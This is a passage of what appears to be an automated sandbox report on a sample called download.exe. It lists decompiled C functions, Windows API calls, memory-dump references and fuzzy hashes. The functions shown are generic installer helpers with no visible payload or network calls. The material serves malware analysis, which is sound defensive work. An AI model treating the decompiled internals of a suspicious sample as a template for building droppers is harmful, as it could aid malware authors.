                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s
                                                      • API String ID: 3540041739-3551169577
                                                      • Opcode ID: 5f074f6faf701013ce45bc378f4b03b5d4ee46098f1275575472d42f1ef86f4b
                                                      • Instruction ID: 24807b9fc88fe5fbc2e72c1c6e729af153b5b07cedbd852725a961613b6e70ef
                                                      • Opcode Fuzzy Hash: 5f074f6faf701013ce45bc378f4b03b5d4ee46098f1275575472d42f1ef86f4b
                                                      • Instruction Fuzzy Hash: 99110A776045282BEB01657D9C41EAF3288DB81378F254637FA26F72D1E978CC1246E8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405915 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405915(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                      0x00405916
                                                      0x0040592d
                                                      0x00405935
                                                      0x00405935
                                                      0x0040593d

                                                      APIs
                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031D6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 0040591B
                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031D6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00405924
                                                      • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405935
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405915
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 2659869361-3355392842
                                                      • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                      • Instruction ID: da490e60620d11e3c07f2fcccd6c796fdaa9f48d202f5171465a07f32f6e55b9
                                                      • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                      • Instruction Fuzzy Hash: B5D0A9A2201E30BED20227169C09ECB2A08CF2231AB05043BF240B61A1CA7C4D428BFE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004059AE Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004059AE(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405940(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                                                      0x004059b7
                                                      0x004059be
                                                      0x004059c1
                                                      0x004059c3
                                                      0x004059c7
                                                      0x004059dc
                                                      0x004059fb
                                                      0x00000000
                                                      0x004059e3
                                                      0x004059e5
                                                      0x004059e6
                                                      0x004059e9
                                                      0x004059ea
                                                      0x004059f2
                                                      0x00000000
                                                      0x00000000
                                                      0x004059f4
                                                      0x004059f7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004059f7
                                                      0x00000000
                                                      0x004059e6
                                                      0x004059d4
                                                      0x00000000
                                                      0x004059d5

                                                      APIs
                                                      • CharNextA.USER32(?,?,Forgngeliges.rea,?,00405A1A,Forgngeliges.rea,Forgngeliges.rea,75A63410,?,C:\Users\user\AppData\Local\Temp\,00405765,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059BC
                                                      • CharNextA.USER32(00000000), ref: 004059C1
                                                      • CharNextA.USER32(00000000), ref: 004059D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharNext
                                                      • String ID: Forgngeliges.rea
                                                      • API String ID: 3213498283-2553225184
                                                      • Opcode ID: 6ae5a98c75981dc822015e60cfe3a73e92d8e62117e7577616a1c134a98ac786
                                                      • Instruction ID: 53b5fd27e09cdb27f7d5e0d280f650891fab3cf45ffc187ddecf7516587659fd
                                                      • Opcode Fuzzy Hash: 6ae5a98c75981dc822015e60cfe3a73e92d8e62117e7577616a1c134a98ac786
                                                      • Instruction Fuzzy Hash: D4F0F6D1908F50EAFB32A6244C54B776B89CB55370F14457BD680772C1C27C4C409FAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00402CFF(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x7960f8; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a2f50;
						if(_t2 >  *0x7a2f50) {
							_t3 = CreateDialogParamA( *0x7a2f40, 0x6f, 0, E00402C7C, 0);
							 *0x7960f8 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406351(0);
					}
				} else {
					_t6 =  *0x7960f8; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x7960f8 = 0;
					return _t6;
				}
			}






                                                      0x00402d06
                                                      0x00402d20
                                                      0x00402d26
                                                      0x00402d30
                                                      0x00402d36
                                                      0x00402d3c
                                                      0x00402d4d
                                                      0x00402d56
                                                      0x00000000
                                                      0x00402d5b
                                                      0x00402d62
                                                      0x00402d28
                                                      0x00402d2f
                                                      0x00402d2f
                                                      0x00402d08
                                                      0x00402d08
                                                      0x00402d0f
                                                      0x00402d12
                                                      0x00402d12
                                                      0x00402d18
                                                      0x00402d1f
                                                      0x00402d1f

                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
                                                      • GetTickCount.KERNEL32 ref: 00402D30
                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402D5B
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                      • String ID:
                                                      • API String ID: 2102729457-0
                                                      • Opcode ID: 87f9a02f322897d0e4f948bf7da259dfca77796329a29cb391b18909f99ca198
                                                      • Instruction ID: b66414e99a5f690dcfe7c27c209bc19b2a06c79591cef1c7d36985daa8eb92e7
                                                      • Opcode Fuzzy Hash: 87f9a02f322897d0e4f948bf7da259dfca77796329a29cb391b18909f99ca198
                                                      • Instruction Fuzzy Hash: D6F05E30401621EBC6116B68FFCEE8F7B74AB45B02712457BF158B11E4DA7C48868B9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405018 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E00405018(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x79f52c != _t16) {
							_push(_t16);
							_push(6);
							 *0x79f52c = _t16;
							E004049EF();
						}
						L11:
						return CallWindowProcA( *0x79f534, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E0040496F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404068(0x413);
				return 0;
			}





                                                      0x0040501c
                                                      0x00405026
                                                      0x00405042
                                                      0x00405064
                                                      0x00405067
                                                      0x0040506d
                                                      0x00405077
                                                      0x00405078
                                                      0x0040507a
                                                      0x00405080
                                                      0x00405080
                                                      0x0040508a
                                                      0x00000000
                                                      0x00405098
                                                      0x0040504f
                                                      0x00405087
                                                      0x00405087
                                                      0x00000000
                                                      0x00405087
                                                      0x0040505b
                                                      0x0040505d
                                                      0x00000000
                                                      0x0040505d
                                                      0x0040502c
                                                      0x00000000
                                                      0x00000000
                                                      0x00405033
                                                      0x00000000

                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00405047
                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00405098
                                                        • Part of subcall function 00404068: SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 0040407A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: d6227ddab35ba9883f4bf3de8d352398880cea24f9ab2b0966d31f7a69b3ea3c
                                                      • Instruction ID: fa8f59a087aa50fe202e55d5174182462002e51d1c5a0d53021f2a5da998cc86
                                                      • Opcode Fuzzy Hash: d6227ddab35ba9883f4bf3de8d352398880cea24f9ab2b0966d31f7a69b3ea3c
                                                      • Instruction Fuzzy Hash: 99012171100608AFDF215F21DD85EAF3625EB84764F244137FA41B61D1C77A8C52DEAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403716 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00403716() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79e504; // 0xb07790
				_t3 = E004036FB(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						_t1 = _t6 + 8; // 0x706b0000
						FreeLibrary( *_t1);
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79e504 =  *0x79e504 & 0x00000000;
				return _t3;
			}







                                                      0x00403717
                                                      0x0040371f
                                                      0x00403726
                                                      0x00403729
                                                      0x00403729
                                                      0x0040372b
                                                      0x0040372d
                                                      0x00403730
                                                      0x00403737
                                                      0x0040373d
                                                      0x00403741
                                                      0x00403742
                                                      0x0040374a

                                                      APIs
                                                      • FreeLibrary.KERNEL32(706B0000,75A63410,00000000,C:\Users\user\AppData\Local\Temp\,004036EE,00403508,?,?,00000006,00000008,0000000A), ref: 00403730
                                                      • GlobalFree.KERNEL32(00B07790), ref: 00403737
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403716
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Free$GlobalLibrary
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 1100898210-3355392842
                                                      • Opcode ID: 4d9750b91f9c818690002108793fa6d5ed1a6d42b958517d28de6e516f48fa46
                                                      • Instruction ID: e3cd8cf2938ee13ec1fefa9c4a9681649e8a36576cb89bbd23f75385d37883fe
                                                      • Opcode Fuzzy Hash: 4d9750b91f9c818690002108793fa6d5ed1a6d42b958517d28de6e516f48fa46
                                                      • Instruction Fuzzy Hash: AEE0C2334011209FC6219F04FE0872A7778AF49B23F06842BF8807B36087781C534BC8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040595C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040595C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                      0x0040595d
                                                      0x00405967
                                                      0x00405969
                                                      0x00405970
                                                      0x00405978
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405978
                                                      0x0040597a
                                                      0x0040597f

                                                      APIs
                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\download.exe,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405962
                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\download.exe,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405970
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-3370423016
                                                      • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                      • Instruction ID: 1bd18926039b2b13e1a5e2b6749e0a20dca9854900914240940d95a6582504e3
                                                      • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                      • Instruction Fuzzy Hash: BAD0C9A2409DB0AEE71363249C04B9F6A88DF26715F0904B7E181F61A1C6BC4D828BAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 706B10E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E706B10E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x706b405c = _a8;
				 *0x706b4060 = _a16;
				 *0x706b4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x706b4038, E706B1556, _t52);
				_t43 =  *0x706b405c +  *0x706b405c * 4 << 2;
				_t17 = E706B123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E706B1266(E706B12AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E706B12D1( *_t55 - 0x30, E706B123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x706b4030;
								 *0x706b4030 = _t31;
								E706B1508(_t31 + 4,  *0x706b4064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x706b4030;
							if( *0x706b4030 != 0) {
								E706B1508( *0x706b4064, _t34 + 4, _t43);
								_t37 =  *0x706b4030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x706b4030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                      0x706b10e7
                                                      0x706b10ef
                                                      0x706b1103
                                                      0x706b110b
                                                      0x706b1116
                                                      0x706b1119
                                                      0x706b1121
                                                      0x706b1124
                                                      0x706b1126
                                                      0x706b11c4
                                                      0x706b11d0
                                                      0x706b112c
                                                      0x706b112d
                                                      0x706b112d
                                                      0x706b1130
                                                      0x706b1131
                                                      0x706b1134
                                                      0x706b1203
                                                      0x706b1206
                                                      0x706b119e
                                                      0x706b11a4
                                                      0x706b11ac
                                                      0x706b11b1
                                                      0x706b11b4
                                                      0x00000000
                                                      0x706b11b4
                                                      0x706b1209
                                                      0x706b120a
                                                      0x706b1186
                                                      0x706b118c
                                                      0x706b1194
                                                      0x00000000
                                                      0x706b1194
                                                      0x706b1152
                                                      0x706b1153
                                                      0x706b115b
                                                      0x706b1168
                                                      0x706b1170
                                                      0x706b1179
                                                      0x706b117e
                                                      0x706b117e
                                                      0x00000000
                                                      0x706b1153
                                                      0x706b113a
                                                      0x706b11d1
                                                      0x706b11d1
                                                      0x706b11d8
                                                      0x706b11e5
                                                      0x706b11ea
                                                      0x706b11ef
                                                      0x706b11f5
                                                      0x706b11fb
                                                      0x706b11fb
                                                      0x00000000
                                                      0x706b11d8
                                                      0x706b1140
                                                      0x706b1143
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1149
                                                      0x706b114c
                                                      0x706b119b
                                                      0x00000000
                                                      0x706b119b
                                                      0x706b114f
                                                      0x706b1150
                                                      0x706b1183
                                                      0x00000000
                                                      0x706b1183
                                                      0x00000000
                                                      0x706b11ba
                                                      0x706b11ba
                                                      0x00000000
                                                      0x706b11c3

                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 706B115B
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B11B4
                                                      • GlobalFree.KERNEL32(?), ref: 706B11C7
                                                      • GlobalFree.KERNEL32(?), ref: 706B11F5
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmpDownload File
